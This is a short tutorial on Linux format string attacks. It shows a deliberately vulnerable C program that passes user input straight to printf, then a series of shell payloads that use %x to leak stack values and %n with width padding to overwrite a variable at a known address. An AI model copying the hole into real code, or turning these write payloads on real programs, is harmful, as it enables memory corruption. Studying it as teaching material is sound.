Linux Format String Attack
Format string attack is attack for C formated strings. Format string function is prinrf() there are other functions that support format string.C code for bad used printf():
1 2 3 4 5 6 7 8 9 10 11 | int main( int argc, char **argv )
{
static int i = 0;
char text[1000];
strcpy(text, argv[1]);
printf("%.8x\n",&i);
printf("No way it never will works because value of i=%d\n",i);
printf( text );
printf("\nValue of i=%d\n",i);
return 0;
}
|
First output is address of static iThan we output values of i and call printf() with first argument fo programm.and then watching value if i
Run:
1 | ./e1 'Halolo'
|
Output:
1 2 3 4 | 08049674
No way it never will works because value of i=0
Halolo
Value of i=0
|
Run:
1 | ./e1 'Halolo%s'
|
Output:
08049674
No way it never will works because value of i=0Halolo(null)
Value of i=0
Run:
1 | ./e1 $'\x74\x96\x04\x08_%x'
|
Output:
1 2 3 4 | 08049674
No way it never will works because value of i=0
t?_0
Value of i=0
|
Read about %n in format string:
Run:
1 | ./e1 $'\x74\x96\x04\x08_%x_%n'
|
Output:
1 2 3 | 08049674
No way it never will works because value of i=0
Segmentation fault
|
Run:
1 | ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
|
Output:
1 2 3 4 | 08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16
|
Run:
1 | ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
|
Output:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | 08049674
No way it never will works because value of i=0
t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000004_
Value of i=1216
|
Now you can input almost any value to i